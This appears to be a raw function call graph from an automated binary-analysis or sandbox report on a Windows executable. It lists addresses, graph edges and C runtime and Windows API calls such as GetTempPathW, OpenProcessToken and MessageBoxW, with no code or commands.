7ff732061a5c 16342->16345 16346 7ff732061a7b 16342->16346 16344 7ff732061a2b 16343->16344 16347 7ff732062910 54 API calls 16344->16347 16348 7ff732074f08 _get_daylight 11 API calls 16345->16348 16349 7ff732061c80 49 API calls 16346->16349 16347->16372 16350 7ff732061a61 16348->16350 16351 7ff732061a92 16349->16351 16352 7ff732062910 54 API calls 16350->16352 16353 7ff732061c80 49 API calls 16351->16353 16352->16372 16354 7ff732061add 16353->16354 16355 7ff7320706d4 73 API calls 16354->16355 16356 7ff732061b01 16355->16356 16357 7ff732061b16 16356->16357 16358 7ff732061b35 16356->16358 16360 7ff732074f08 _get_daylight 11 API calls 16357->16360 16359 7ff73207039c _fread_nolock 53 API calls 16358->16359 16362 7ff732061b4a 16359->16362 16361 7ff732061b1b 16360->16361 16363 7ff732062910 54 API calls 16361->16363 16364 7ff732061b50 16362->16364 16365 7ff732061b6f 16362->16365 16363->16372 16366 7ff732074f08 _get_daylight 11 API calls 16364->16366 17069 7ff732070110 16365->17069 16368 7ff732061b55 16366->16368 16370 7ff732062910 54 API calls 16368->16370 16370->16372 16371 7ff732062710 54 API calls 16371->16372 16372->16331 16374 7ff73206883a 16373->16374 16375 7ff732069390 2 API calls 16374->16375 16376 7ff732068859 GetEnvironmentVariableW 16375->16376 16377 7ff732068876 ExpandEnvironmentStringsW 16376->16377 16378 7ff7320688c2 16376->16378 16377->16378 16379 7ff732068898 16377->16379 16380 7ff73206c550 _log10_special 8 API calls 16378->16380 16381 7ff732069440 2 API calls 16379->16381 16382 7ff7320688d4 16380->16382 16383 7ff7320688aa 16381->16383 16382->16132 16384 7ff73206c550 _log10_special 8 API calls 16383->16384 16385 7ff7320688ba 16384->16385 16385->16132 16387 7ff732069390 2 API calls 16386->16387 16388 7ff73206895c 16387->16388 16389 7ff732069390 2 API calls 16388->16389 16390 7ff73206896c 16389->16390 17287 7ff732078238 16390->17287 16392 7ff73206897a __std_exception_destroy 16392->16172 16394 7ff7320690f5 16393->16394 17305 7ff732068570 GetCurrentProcess OpenProcessToken 16394->17305 16397 7ff732068570 7 API calls 16398 7ff732069121 16397->16398 16399 7ff73206913a 16398->16399 16400 7ff732069154 16398->16400 16401 7ff7320626b0 48 API calls 16399->16401 16402 7ff7320626b0 48 API calls 16400->16402 16403 7ff732069152 16401->16403 16404 7ff732069167 LocalFree LocalFree 16402->16404 16403->16404 16405 7ff732069183 16404->16405 16407 7ff73206918f 16404->16407 17315 7ff732062b50 16405->17315 16408 7ff73206c550 _log10_special 8 API calls 16407->16408 16409 7ff732063c55 16408->16409 16409->16177 16410 7ff732068660 16409->16410 16411 7ff732068678 16410->16411 16412 7ff73206869c 16411->16412 16413 7ff7320686fa GetTempPathW GetCurrentProcessId 16411->16413 16415 7ff732068830 14 API calls 16412->16415 17324 7ff7320625c0 16413->17324 16417 7ff7320686a8 16415->16417 16416 7ff732068728 __std_exception_destroy 16429 7ff732068765 __std_exception_destroy 16416->16429 17328 7ff732078b68 16416->17328 17331 7ff7320681d0 16417->17331 16428 7ff73206c550 _log10_special 8 API calls 16431 7ff732063cbb 16428->16431 16434 7ff732069390 2 API calls 16429->16434 16442 7ff7320687d4 __std_exception_destroy 16429->16442 16431->16177 16431->16189 16435 7ff7320687b1 16434->16435 16436 7ff7320687e9 16435->16436 16437 7ff7320687b6 16435->16437 16442->16428 16444 7ff7320693b2 MultiByteToWideChar 16443->16444 16445 7ff7320693d6 16443->16445 16444->16445 16447 7ff7320693ec __std_exception_destroy 16444->16447 16446 7ff7320693f3 MultiByteToWideChar 16445->16446 16445->16447 16446->16447 16447->16188 16453 7ff7320633ce __scrt_get_show_window_mode 16448->16453 16449 7ff7320635c7 16450 7ff73206c550 _log10_special 8 API calls 16449->16450 16451 7ff732063664 16450->16451 16451->16195 16467 7ff7320690c0 LocalFree 16451->16467 16453->16449 16454 7ff732061c80 49 API calls 16453->16454 16459 7ff7320635c9 16453->16459 16460 7ff732062a50 54 API calls 16453->16460 16462 7ff7320635e2 16453->16462 16465 7ff7320635d0 16453->16465 17602 7ff732064560 16453->17602 17608 7ff732067e20 16453->17608 17619 7ff732061600 16453->17619 17667 7ff732067120 16453->17667 17671 7ff732064190 16453->17671 17715 7ff732064450 16453->17715 16454->16453 16456 7ff732062710 54 API calls 16456->16449 16461 7ff732062710 54 API calls 16459->16461 16460->16453 16461->16449 16462->16456 16466 7ff732062710 54 API calls 16465->16466 16466->16449 16469 7ff732061ca5 16468->16469 16470 7ff732074984 49 API calls 16469->16470 16471 7ff732061cc8 16470->16471 16471->16127 16473 7ff732069390 2 API calls 16472->16473 16474 7ff7320689b4 16473->16474 16475 7ff732078238 38 API calls 16474->16475 16476 7ff7320689c6 __std_exception_destroy 16475->16476 16476->16140 16478 7ff7320645cc 16477->16478 16479 7ff732069390 2 API calls 16478->16479 16480 7ff7320645f4 16479->16480 16481 7ff732069390 2 API calls 16480->16481 16482 7ff732064607 16481->16482 17898 7ff732075f94 16482->17898 16485 7ff73206c550 _log10_special 8 API calls 16486 7ff73206392b 16485->16486 16486->16130 16487 7ff732067f90 16486->16487 16488 7ff732067fb4 16487->16488 16489 7ff7320706d4 73 API calls 16488->16489 16494 7ff73206808b __std_exception_destroy 16488->16494 16490 7ff732067fd0 16489->16490 16490->16494 18289 7ff7320778c8 16490->18289 16492 7ff7320706d4 73 API calls 16495 7ff732067fe5 16492->16495 16493 7ff73207039c _fread_nolock 53 API calls 16493->16495 16494->16134 16495->16492 16495->16493 16495->16494 16497 7ff73207007c 16496->16497 18304 7ff73206fe28 16497->18304 16499 7ff732070095 16499->16130 16501 7ff73206c850 16500->16501 16502 7ff732062734 GetCurrentProcessId 16501->16502 16503 7ff732061c80 49 API calls 16502->16503 16504 7ff732062787 16503->16504 16505 7ff732074984 49 API calls 16504->16505 16506 7ff7320627cf 16505->16506 16507 7ff732062620 12 API calls 16506->16507 16508 7ff7320627f1 16507->16508 16509 7ff73206c550 _log10_special 8 API calls 16508->16509 16510 7ff732062801 16509->16510 16510->16195 16512 7ff732061c80 49 API calls 16511->16512 16513 7ff7320644fd 16512->16513 16513->16171 16515 7ff732061c80 49 API calls 16514->16515 16516 7ff732064660 16515->16516 16516->16189 16518 7ff732066dd5 16517->16518 16519 7ff732063e6c 16518->16519 16520 7ff732074f08 _get_daylight 11 API calls 16518->16520 16523 7ff732067340 16519->16523 16521 7ff732066de2 16520->16521 16522 7ff732062910 54 API calls 16521->16522 16522->16519 18315 7ff732061470 16523->18315 18421 7ff732066360 16591->18421 16594 7ff732063399 16611 7ff73207546c EnterCriticalSection 16604->16611 16613 7ff7320636bc GetModuleFileNameW 16612->16613 16613->16304 16613->16305 16615 7ff7320692d2 16614->16615 16616 7ff7320692bf FindClose 16614->16616 16617 7ff73206c550 _log10_special 8 API calls 16615->16617 16616->16615 16618 7ff73206371a 16617->16618 16618->16309 16618->16310 16620 7ff73206c850 16619->16620 16621 7ff732062c70 GetCurrentProcessId 16620->16621 16650 7ff7320626b0 16621->16650 16623 7ff732062cb9 16654 7ff732074bd8 16623->16654 16626 7ff7320626b0 48 API calls 16627 7ff732062d34 FormatMessageW 16626->16627 16629 7ff732062d6d 16627->16629 16630 7ff732062d7f MessageBoxW 16627->16630 16631 7ff7320626b0 48 API calls 16629->16631 16632 7ff73206c550 _log10_special 8 API calls 16630->16632 16631->16630 16633 7ff732062daf 16632->16633 16633->16321 16635 7ff732063730 16634->16635 16636 7ff732069340 GetFinalPathNameByHandleW CloseHandle 16634->16636 16635->16317 16635->16320 16636->16635 16638 7ff732062834 16637->16638 16639 7ff7320626b0 48 API calls 16638->16639 16640 7ff732062887 16639->16640 16641 7ff732074bd8 48 API calls 16640->16641 16642 7ff7320628d0 MessageBoxW 16641->16642 16643 7ff73206c550 _log10_special 8 API calls 16642->16643 16644 7ff732062900 16643->16644 16644->16321 16646 7ff73206946a WideCharToMultiByte 16645->16646 16647 7ff732069495 16645->16647 16646->16647 16649 7ff7320694ab __std_exception_destroy 16646->16649 16648 7ff7320694b2 WideCharToMultiByte 16647->16648 16647->16649 16648->16649 16649->16314 16651 7ff7320626d5 16650->16651 16652 7ff732074bd8 48 API calls 16651->16652 16653 7ff7320626f8 16652->16653 16653->16623 16657 7ff732074c32 16654->16657 16655 7ff732074c57 16656 7ff73207a814 _invalid_parameter_noinfo 37 API calls 16655->16656 16660 7ff732074c81 16656->16660 16657->16655 16658 7ff732074c93 16657->16658 16672 7ff732072f90 16658->16672 16662 7ff73206c550 _log10_special 8 API calls 16660->16662 16661 7ff73207a948 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 16661->16660 16664 7ff732062d04 16662->16664 16664->16626 16665 7ff732074d9a 16667 7ff732074da4 16665->16667 16670 7ff732074d74 16665->16670 16666 7ff732074d40 16669 7ff732074d49 16666->16669 16666->16670 16671 7ff73207a948 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 16667->16671 16668 7ff73207a948 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 16668->16660 16669->16668 16670->16661 16671->16660 16673 7ff732072fce 16672->16673 16674 7ff732072fbe 16672->16674 16675 7ff732072fd7 16673->16675 16681 7ff732073005 16673->16681 16676 7ff73207a814 _invalid_parameter_noinfo 37 API calls 16674->16676 16677 7ff73207a814 _invalid_parameter_noinfo 37 API calls 16675->16677 16678 7ff732072ffd 16676->16678 16677->16678 16678->16665 16678->16666 16678->16669 16678->16670 16681->16674 16681->16678 16683 7ff7320739a4 16681->16683 16716 7ff7320733f0 16681->16716 16753 7ff732072b80 16681->16753 16684 7ff732073a57 16683->16684 16685 7ff7320739e6 16683->16685 16688 7ff732073a5c 16684->16688 16689 7ff732073ab0 16684->16689 16686 7ff7320739ec 16685->16686 16687 7ff732073a81 16685->16687 16690 7ff7320739f1 16686->16690 16691 7ff732073a20 16686->16691 16776 7ff732071d54 16687->16776 16692 7ff732073a5e 16688->16692 16693 7ff732073a91 16688->16693 16694 7ff732073aba 16689->16694 16695 7ff732073ac7 16689->16695 16700 7ff732073abf 16689->16700 16690->16695 16697 7ff7320739f7 16690->16697 16691->16697 16691->16700 16698 7ff732073a00 16692->16698 16703 7ff732073a6d 16692->16703 16783 7ff732071944 16693->16783 16694->16687 16694->16700 16790 7ff7320746ac 16695->16790 16697->16698 16704 7ff732073a32 16697->16704 16713 7ff732073a1b 16697->16713 16714 7ff732073af0 16698->16714 16756 7ff732074158 16698->16756 16700->16714 16794 7ff732072164 16700->16794 16703->16687 16706 7ff732073a72 16703->16706 16704->16714 16766 7ff732074494 16704->16766 16706->16714 16772 7ff732074558 16706->16772 16708 7ff73206c550 _log10_special 8 API calls 16710 7ff732073dea 16708->16710 16710->16681 16713->16714 16715 7ff732073cdc 16713->16715 16801 7ff7320747c0 16713->16801 16714->16708 16715->16714 16807 7ff73207ea08 16715->16807 16717 7ff7320733fe 16716->16717 16718 7ff732073414 16716->16718 16719 7ff732073454 16717->16719 16720 7ff732073a57 16717->16720 16721 7ff7320739e6 16717->16721 16718->16719 16722 7ff73207a814 _invalid_parameter_noinfo 37 API calls 16718->16722 16719->16681 16725 7ff732073a5c 16720->16725 16726 7ff732073ab0 16720->16726 16723 7ff7320739ec 16721->16723 16724 7ff732073a81 16721->16724 16722->16719 16727 7ff7320739f1 16723->16727 16728 7ff732073a20 16723->16728 16733 7ff732071d54 38 API calls 16724->16733 16729 7ff732073a5e 16725->16729 16730 7ff732073a91 16725->16730 16731 7ff732073aba 16726->16731 16732 7ff732073ac7 16726->16732 16737 7ff732073abf 16726->16737 16727->16732 16734 7ff7320739f7 16727->16734 16728->16734 16728->16737 16735 7ff732073a00 16729->16735 16742 7ff732073a6d 16729->16742 16739 7ff732071944 38 API calls 16730->16739 16731->16724 16731->16737 16738 7ff7320746ac 45 API calls 16732->16738 16750 7ff732073a1b 16733->16750 16734->16735 16740 7ff732073a32 16734->16740 16734->16750 16736 7ff732074158 47 API calls 16735->16736 16751 7ff732073af0 16735->16751 16736->16750 16741 7ff732072164 38 API calls 16737->16741 16737->16751 16738->16750 16739->16750 16743 7ff732074494 46 API calls 16740->16743 16740->16751 16741->16750 16742->16724 16744 7ff732073a72 16742->16744 16743->16750 16746 7ff732074558 37 API calls 16744->16746 16744->16751 16745 7ff73206c550 _log10_special 8 API calls 16747 7ff732073dea 16745->16747 16746->16750 16747->16681 16748 7ff7320747c0 45 API calls 16752 7ff732073cdc 16748->16752 16749 7ff73207ea08 46 API calls 16749->16752 16750->16748 16750->16751 16750->16752 16751->16745 16752->16749 16752->16751 17030 7ff732070fc8 16753->17030 16757 7ff73207417e 16756->16757 16819 7ff732070b80 16757->16819 16761 7ff7320742c3 16764 7ff7320747c0 45 API calls 16761->16764 16765 7ff732074351 16761->16765 16763 7ff7320747c0 45 API calls 16763->16761 16764->16765 16765->16713 16769 7ff7320744c9 16766->16769 16767 7ff73207450e 16767->16713 16768 7ff7320744e7 16771 7ff73207ea08 46 API calls 16768->16771 16769->16767 16769->16768 16770 7ff7320747c0 45 API calls 16769->16770 16770->16768 16771->16767 16774 7ff732074579 16772->16774 16773 7ff73207a814 _invalid_parameter_noinfo 37 API calls 16775 7ff7320745aa 16773->16775 16774->16773 16774->16775 16775->16713 16777 7ff732071d87 16776->16777 16778 7ff732071db6 16777->16778 16780 7ff732071e73 16777->16780 16782 7ff732071df3 16778->16782 16962 7ff732070c28 16778->16962 16781 7ff73207a814 _invalid_parameter_noinfo 37 API calls 16780->16781 16781->16782 16782->16713 16785 7ff732071977 16783->16785 16784 7ff7320719a6 16786 7ff732070c28 12 API calls 16784->16786 16789 7ff7320719e3 16784->16789 16785->16784 16787 7ff732071a63 16785->16787 16786->16789 16788 7ff73207a814 _invalid_parameter_noinfo 37 API calls 16787->16788 16788->16789 16789->16713 16791 7ff7320746ef 16790->16791 16793 7ff7320746f3 __crtLCMapStringW 16791->16793 16970 7ff732074748 16791->16970 16793->16713 16795 7ff732072197 16794->16795 16796 7ff7320721c6 16795->16796 16798 7ff732072283 16795->16798 16797 7ff732070c28 12 API calls 16796->16797 16800 7ff732072203 16796->16800 16797->16800 16799 7ff73207a814 _invalid_parameter_noinfo 37 API calls 16798->16799 16799->16800 16800->16713 16802 7ff7320747d7 16801->16802 16974 7ff73207d9b8 16802->16974 16809 7ff73207ea39 16807->16809 16815 7ff73207ea47 16807->16815 16808 7ff73207ea67 16811 7ff73207ea78 16808->16811 16812 7ff73207ea9f 16808->16812 16809->16808 16810 7ff7320747c0 45 API calls 16809->16810 16809->16815 16810->16808 17020 7ff7320800a0 16811->17020 16814 7ff73207eb2a 16812->16814 16812->16815 16817 7ff73207eac9 16812->16817 16816 7ff73207f8a0 _fread_nolock MultiByteToWideChar 16814->16816 16815->16715 16816->16815 16817->16815 17023 7ff73207f8a0 16817->17023 16820 7ff732070bb7 16819->16820 16825 7ff732070ba6 16819->16825 16820->16825 16849 7ff73207d5fc 16820->16849 16823 7ff73207a948 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 16823->16825 16824 7ff73207a948 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 16826 7ff732070bf8 16824->16826 16827 7ff73207e570 16825->16827 16826->16823 16828 7ff73207e58d 16827->16828 16829 7ff73207e5c0 16827->16829 16830 7ff73207a814 _invalid_parameter_noinfo 37 API calls 16828->16830 16829->16828 16831 7ff73207e5f2 16829->16831 16840 7ff7320742a1 16830->16840 16835 7ff73207e705 16831->16835 16843 7ff73207e63a 16831->16843 16832 7ff73207e7f7 16889 7ff73207da5c 16832->16889 16834 7ff73207e7bd 16882 7ff73207ddf4 16834->16882 16835->16832 16835->16834 16837 7ff73207e78c 16835->16837 16839 7ff73207e74f 16835->16839 16841 7ff73207e745 16835->16841 16875 7ff73207e0d4 16837->16875 16865 7ff73207e304 16839->16865 16840->16761 16840->16763 16841->16834 16844 7ff73207e74a 16841->16844 16843->16840 16843->16843 16856 7ff73207a4a4 16843->16856 16844->16837 16844->16839 16847 7ff73207a900 _isindst 17 API calls 16848 7ff73207e854 16847->16848 16850 7ff73207d647 16849->16850 16855 7ff73207d60b _get_daylight 16849->16855 16852 7ff732074f08 _get_daylight 11 API calls 16850->16852 16851 7ff73207d62e HeapAlloc 16853 7ff732070be4 16851->16853 16851->16855 16852->16853 16853->16824 16853->16826 16854 7ff732083590 _get_daylight 2 API calls 16854->16855 16855->16850 16855->16851 16855->16854 16857 7ff73207a4bb 16856->16857 16858 7ff73207a4b1 16856->16858 16859 7ff732074f08 _get_daylight 11 API calls 16857->16859 16858->16857 16863 7ff73207a4d6 16858->16863 16860 7ff73207a4c2 16859->16860 16862 7ff73207a8e0 _invalid_parameter_noinfo 37 API calls 16860->16862 16861 7ff73207a4ce 16861->16840 16861->16847 16862->16861 16863->16861 16864 7ff732074f08 _get_daylight 11 API calls 16863->16864 16864->16860 16898 7ff7320840ac 16865->16898 16869 7ff73207e3ac 16870 7ff73207e401 16869->16870 16871 7ff73207e3cc 16869->16871 16874 7ff73207e3b0 16869->16874 16951 7ff73207def0 16870->16951 16947 7ff73207e1ac 16871->16947 16874->16840 16876 7ff7320840ac 38 API calls 16875->16876 16877 7ff73207e11e 16876->16877 16878 7ff732083af4 37 API calls 16877->16878 16879 7ff73207e16e 16878->16879 16880 7ff73207e172 16879->16880 16881 7ff73207e1ac 45 API calls 16879->16881 16880->16840 16881->16880 16883 7ff7320840ac 38 API calls 16882->16883 16884 7ff73207de3f 16883->16884 16885 7ff732083af4 37 API calls 16884->16885 16886 7ff73207de97 16885->16886 16887 7ff73207de9b 16886->16887 16888 7ff73207def0 45 API calls 16886->16888 16887->16840 16888->16887 16890 7ff73207dad4 16889->16890 16891 7ff73207daa1 16889->16891 16893 7ff73207daec 16890->16893 16895 7ff73207db6d 16890->16895 16892 7ff73207a814 _invalid_parameter_noinfo 37 API calls 16891->16892 16897 7ff73207dacd __scrt_get_show_window_mode 16892->16897 16894 7ff73207ddf4 46 API calls 16893->16894 16894->16897 16896 7ff7320747c0 45 API calls 16895->16896 16895->16897 16896->16897 16897->16840 16899 7ff7320840ff fegetenv 16898->16899 16900 7ff732087e2c 37 API calls 16899->16900 16903 7ff732084152 16900->16903 16901 7ff73208417f 16905 7ff73207a4a4 __std_exception_copy 37 API calls 16901->16905 16902 7ff732084242 16904 7ff732087e2c 37 API calls 16902->16904 16903->16902 16909 7ff73208421c 16903->16909 16910 7ff73208416d 16903->16910 16906 7ff73208426c 16904->16906 16908 7ff7320841fd 16905->16908 16907 7ff732087e2c 37 API calls 16906->16907 16911 7ff73208427d 16907->16911 16912 7ff732085324 16908->16912 16917 7ff732084205 16908->16917 16913 7ff73207a4a4 __std_exception_copy 37 API calls 16909->16913 16910->16901 16910->16902 16914 7ff732088020 20 API calls 16911->16914 16915 7ff73207a900 _isindst 17 API calls 16912->16915 16913->16908 16920 7ff7320842e6 __scrt_get_show_window_mode 16914->16920 16916 7ff732085339 16915->16916 16918 7ff73206c550 _log10_special 8 API calls 16917->16918 16919 7ff73207e351 16918->16919 16943 7ff732083af4 16919->16943 16921 7ff732084327 memcpy_s 16920->16921 16922 7ff73208468f __scrt_get_show_window_mode 16920->16922 16927 7ff732074f08 _get_daylight 11 API calls 16920->16927 16936 7ff732084783 memcpy_s __scrt_get_show_window_mode 16921->16936 16938 7ff732084c6b memcpy_s __scrt_get_show_window_mode 16921->16938 16923 7ff7320849cf 16924 7ff732083c10 37 API calls 16923->16924 16930 7ff7320850e7 16924->16930 16925 7ff73208497b 16925->16923 16926 7ff73208533c memcpy_s 37 API calls 16925->16926 16926->16923 16928 7ff732084760 16927->16928 16929 7ff73207a8e0 _invalid_parameter_noinfo 37 API calls 16928->16929 16929->16921 16931 7ff73208533c memcpy_s 37 API calls 16930->16931 16941 7ff732085142 16930->16941 16931->16941 16932 7ff7320852c8 16933 7ff732087e2c 37 API calls 16932->16933 16933->16917 16934 7ff732074f08 11 API calls _get_daylight 16934->16938 16935 7ff732074f08 11 API calls _get_daylight 16935->16936 16936->16925 16936->16935 16939 7ff73207a8e0 37 API calls _invalid_parameter_noinfo 16936->16939 16937 7ff732083c10 37 API calls 16937->16941 16938->16923 16938->16925 16938->16934 16942 7ff73207a8e0 37 API calls _invalid_parameter_noinfo 16938->16942 16939->16936 16940 7ff73208533c memcpy_s 37 API calls 16940->16941 16941->16932 16941->16937 16941->16940 16942->16938 16944 7ff732083b13 16943->16944 16945 7ff73207a814 _invalid_parameter_noinfo 37 API calls 16944->16945 16946 7ff732083b3e memcpy_s 16944->16946 16945->16946 16946->16869 16948 7ff73207e1d8 memcpy_s 16947->16948 16949 7ff7320747c0 45 API calls 16948->16949 16950 7ff73207e292 memcpy_s __scrt_get_show_window_mode 16948->16950 16949->16950 16950->16874 16952 7ff73207df2b 16951->16952 16957 7ff73207df78 memcpy_s 16951->16957 16953 7ff73207a814 _invalid_parameter_noinfo 37 API calls 16952->16953 16954 7ff73207df57 16953->16954 16954->16874 16955 7ff73207dfe3 16956 7ff73207a4a4 __std_exception_copy 37 API calls 16955->16956 16961 7ff73207e025 memcpy_s 16956->16961 16957->16955 16958 7ff7320747c0 45 API calls 16957->16958 16958->16955 16959 7ff73207a900 _isindst 17 API calls 16960 7ff73207e0d0 16959->16960 16961->16959 16963 7ff732070c5f 16962->16963 16969 7ff732070c4e 16962->16969 16964 7ff73207d5fc _fread_nolock 12 API calls 16963->16964 16963->16969 16965 7ff732070c90 16964->16965 16966 7ff732070ca4 16965->16966 16967 7ff73207a948 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 16965->16967 16968 7ff73207a948 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 16966->16968 16967->16966 16968->16969 16969->16782 16971 7ff73207476e 16970->16971 16972 7ff732074766 16970->16972 16971->16793 16973 7ff7320747c0 45 API calls 16972->16973 16973->16971 16975 7ff7320747ff 16974->16975 16976 7ff73207d9d1 16974->16976 16978 7ff73207da24 16975->16978 16976->16975 16982 7ff732083304 16976->16982 16979 7ff73207da3d 16978->16979 16981 7ff73207480f 16978->16981 16979->16981 17017 7ff732082650 16979->17017 16981->16715 16994 7ff73207b150 GetLastError 16982->16994 16985 7ff73208335e 16985->16975 16995 7ff73207b174 FlsGetValue 16994->16995 16996 7ff73207b191 FlsSetValue 16994->16996 16997 7ff73207b18b 16995->16997 17013 7ff73207b181 16995->17013 16998 7ff73207b1a3 16996->16998 16996->17013 16997->16996 17000 7ff73207eb98 _get_daylight 11 API calls 16998->17000 16999 7ff73207b1fd SetLastError 17001 7ff73207b21d 16999->17001 17002 7ff73207b20a 16999->17002 17003 7ff73207b1b2 17000->17003 17004 7ff73207a504 __FrameHandler3::FrameUnwindToEmptyState 38 API calls 17001->17004 17002->16985 17016 7ff7320802d8 EnterCriticalSection 17002->17016 17005 7ff73207b1d0 FlsSetValue 17003->17005 17006 7ff73207b1c0 FlsSetValue 17003->17006 17009 7ff73207b222 17004->17009 17007 7ff73207b1ee 17005->17007 17008 7ff73207b1dc FlsSetValue 17005->17008 17010 7ff73207b1c9 17006->17010 17012 7ff73207aef4 _get_daylight 11 API calls 17007->17012 17008->17010 17011 7ff73207a948 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 17010->17011 17011->17013 17014 7ff73207b1f6 17012->17014 17013->16999 17015 7ff73207a948 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 17014->17015 17015->16999 17018 7ff73207b150 __FrameHandler3::FrameUnwindToEmptyState 45 API calls 17017->17018 17019 7ff732082659 17018->17019 17026 7ff732086d88 17020->17026 17025 7ff73207f8a9 MultiByteToWideChar 17023->17025 17027 7ff732086dec 17026->17027 17028 7ff73206c550 _log10_special 8 API calls 17027->17028 17029 7ff7320800bd 17028->17029 17029->16815 17031 7ff732070ffd 17030->17031 17032 7ff73207100f 17030->17032 17033 7ff732074f08 _get_daylight 11 API calls 17031->17033 17035 7ff73207101d 17032->17035 17039 7ff732071059 17032->17039 17034 7ff732071002 17033->17034 17036 7ff73207a8e0 _invalid_parameter_noinfo 37 API calls 17034->17036 17037 7ff73207a814 _invalid_parameter_noinfo 37 API calls 17035->17037 17044 7ff73207100d 17036->17044 17037->17044 17038 7ff7320713d5 17040 7ff732074f08 _get_daylight 11 API calls 17038->17040 17038->17044 17039->17038 17041 7ff732074f08 _get_daylight 11 API calls 17039->17041 17042 7ff732071669 17040->17042 17043 7ff7320713ca 17041->17043 17045 7ff73207a8e0 _invalid_parameter_noinfo 37 API calls 17042->17045 17046 7ff73207a8e0 _invalid_parameter_noinfo 37 API calls 17043->17046 17044->16681 17045->17044 17046->17038 17048 7ff732070704 17047->17048 17075 7ff732070464 17048->17075 17050 7ff73207071d 17050->16333 17087 7ff7320703bc 17051->17087 17055 7ff73206c850 17054->17055 17056 7ff732062930 GetCurrentProcessId 17055->17056 17057 7ff732061c80 49 API calls 17056->17057 17058 7ff732062979 17057->17058 17101 7ff732074984 17058->17101 17063 7ff732061c80 49 API calls 17064 7ff7320629ff 17063->17064 17131 7ff732062620 17064->17131 17067 7ff73206c550 _log10_special 8 API calls 17068 7ff732062a31 17067->17068 17068->16372 17070 7ff732061b89 17069->17070 17071 7ff732070119 17069->17071 17070->16371 17070->16372 17072 7ff732074f08 _get_daylight 11 API calls 17071->17072 17073 7ff73207011e 17072->17073 17074 7ff73207a8e0 _invalid_parameter_noinfo 37 API calls 17073->17074 17074->17070 17076 7ff7320704ce 17075->17076 17077 7ff73207048e 17075->17077 17076->17077 17079 7ff7320704da 17076->17079 17078 7ff73207a814 _invalid_parameter_noinfo 37 API calls 17077->17078 17081 7ff7320704b5 17078->17081 17086 7ff73207546c EnterCriticalSection 17079->17086 17081->17050 17088 7ff7320703e6 17087->17088 17099 7ff732061a20 17087->17099 17089 7ff732070432 17088->17089 17091 7ff7320703f5 __scrt_get_show_window_mode 17088->17091 17088->17099 17100 7ff73207546c EnterCriticalSection 17089->17100 17093 7ff732074f08 _get_daylight 11 API calls 17091->17093 17095 7ff73207040a 17093->17095 17097 7ff73207a8e0 _invalid_parameter_noinfo 37 API calls 17095->17097 17097->17099 17099->16341 17099->16342 17104 7ff7320749de 17101->17104 17102 7ff732074a03 17103 7ff73207a814 _invalid_parameter_noinfo 37 API calls 17102->17103 17107 7ff732074a2d 17103->17107 17104->17102 17105 7ff732074a3f 17104->17105 17140 7ff732072c10 17105->17140 17110 7ff73206c550 _log10_special 8 API calls 17107->17110 17108 7ff732074b1c 17109 7ff73207a948 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 17108->17109 17109->17107 17112 7ff7320629c3 17110->17112 17119 7ff732075160 17112->17119 17113 7ff732074af1 17117 7ff73207a948 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 17113->17117 17114 7ff732074b40 17114->17108 17116 7ff732074b4a 17114->17116 17115 7ff732074ae8 17115->17108 17115->17113 17118 7ff73207a948 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 17116->17118 17117->17107 17118->17107 17120 7ff73207b2c8 _get_daylight 11 API calls 17119->17120 17121 7ff732075177 17120->17121 17122 7ff73207eb98 _get_daylight 11 API calls 17121->17122 17125 7ff7320751b7 17121->17125 17128 7ff7320629e5 17121->17128 17123 7ff7320751ac 17122->17123 17124 7ff73207a948 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 17123->17124 17124->17125 17125->17128 17278 7ff73207ec20 17125->17278 17128->17063 17129 7ff73207a900 _isindst 17 API calls 17130 7ff7320751fc 17129->17130 17132 7ff73206262f 17131->17132 17133 7ff732069390 2 API calls 17132->17133 17134 7ff732062660 17133->17134 17135 7ff732062683 MessageBoxA 17134->17135 17136 7ff73206266f MessageBoxW 17134->17136 17137 7ff732062690 17135->17137 17136->17137 17138 7ff73206c550 _log10_special 8 API calls 17137->17138 17139 7ff7320626a0 17138->17139 17139->17067 17141 7ff732072c4e 17140->17141 17146 7ff732072c3e 17140->17146 17142 7ff732072c57 17141->17142 17150 7ff732072c85 17141->17150 17145 7ff73207a814 _invalid_parameter_noinfo 37 API calls 17142->17145 17143 7ff732072c7d 17143->17108 17143->17113 17143->17114 17143->17115 17144 7ff73207a814 _invalid_parameter_noinfo 37 API calls 17144->17143 17145->17143 17146->17144 17147 7ff7320747c0 45 API calls 17147->17150 17149 7ff732072f34 17152 7ff73207a814 _invalid_parameter_noinfo 37 API calls 17149->17152 17150->17143 17150->17146 17150->17147 17150->17149 17154 7ff7320735a0 17150->17154 17180 7ff732073268 17150->17180 17210 7ff732072af0 17150->17210 17152->17146 17155 7ff732073655 17154->17155 17156 7ff7320735e2 17154->17156 17159 7ff73207365a 17155->17159 17160 7ff7320736af 17155->17160 17157 7ff7320735e8 17156->17157 17158 7ff73207367f 17156->17158 17167 7ff7320735ed 17157->17167 17172 7ff7320736be 17157->17172 17227 7ff732071b50 17158->17227 17161 7ff73207365c 17159->17161 17162 7ff73207368f 17159->17162 17160->17158 17160->17172 17178 7ff732073618 17160->17178 17164 7ff7320735fd 17161->17164 17170 7ff73207366b 17161->17170 17234 7ff732071740 17162->17234 17171 7ff7320736ed 17164->17171 17213 7ff732073f04 17164->17213 17167->17164 17169 7ff732073630 17167->17169 17167->17178 17169->17171 17223 7ff7320743c0 17169->17223 17170->17158 17174 7ff732073670 17170->17174 17175 7ff73206c550 _log10_special 8 API calls 17171->17175 17172->17171 17241 7ff732071f60 17172->17241 17174->17171 17176 7ff732074558 37 API calls 17174->17176 17177 7ff732073983 17175->17177 17176->17178 17177->17150 17178->17171 17248 7ff73207e858 17178->17248 17181 7ff732073289 17180->17181 17182 7ff732073273 17180->17182 17185 7ff73207a814 _invalid_parameter_noinfo 37 API calls 17181->17185 17198 7ff7320732c7 17181->17198 17183 7ff732073655 17182->17183 17184 7ff7320735e2 17182->17184 17182->17198 17186 7ff73207365a 17183->17186 